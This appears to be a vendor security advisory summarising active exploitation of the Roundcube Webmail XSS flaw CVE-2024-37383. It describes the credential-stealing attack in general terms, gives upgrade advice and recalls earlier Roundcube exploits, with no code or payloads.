Threat actors are exploiting a cross-site scripting (XSS) vulnerability in Roundcube Webmail, allowing them to steal email credentials and messages contained on the server. The flaw, designated CVE-2024-37383, allows threat actors to embed malicious JavaScript code within emails.
When the target opens the email, the script activates and injects an unauthorized login form into the HTML page to request messages from the mail server. The form is then filled, manually by the user or automatically, and the inputted credentials are sent to a remote server under the threat actor’s control.
Additionally, the threat actors use the ManageSieve plugin to exfiltrate email messages from the mail server.
The vulnerability impacts Roundcube versions prior to 1.5.6 and 1.6.x before 1.6.6. Users are advised to upgrade immediately to avoid falling victim to this exploit. Threat actors are primarily targeting organizations in the CIS region, though the flaw could affect users worldwide.
Source: Bleeping Computer
Analysis
The exploit of CVE-2024-37383 highlights the growing trend of sophisticated email-based attacks and serves as another reminder of the importance of regularly updating software to defend against evolving threats.
Roundcube Webmail has been exploited by threat actors several times over the last few years, often centred around XSS vulnerabilities and plugin-related issues. For example, in 2024, threat actors were observed exploiting a stored XSS vulnerability, designated CVE-2023-43770, which allowed them to access restricted information in low-complexity attacks requiring user interaction.
Roundcube vulnerabilities have also attracted the attention of Russian state-sponsored cyber actors. In October 2023, Russian hackers were observed exploiting a zero-day XSS flaw on Roundcube, tracked as CVE-2023-5631, to breach government entities and think tanks in Europe. In June 2023, hackers belonging to Russia’s Main Intelligence Directorate (GRU) exploited four Roundcube flaws to steal information from email servers used by multiple organizations in Ukraine, including government agencies.
Mitigation
Field Effect’s Security Intelligence team constantly monitors the cyber threat landscape for vulnerabilities in services like Roundcube. This research contributes to the timely deployment of signatures into Field Effect MDR to detect and mitigate the risk these vulnerabilities pose.
Field Effect MDR users were automatically notified if the use of Roundcube webmail was detected in their environment and are encouraged to review these AROs as quickly as possible via the Field Effect Portal.
Field Effect users are encouraged to submit suspicious emails to Field Effect’s Suspicious Email Analysis Service (SEAS) to ensure they are benign before clicking links or opening an attachment.
Related Articles
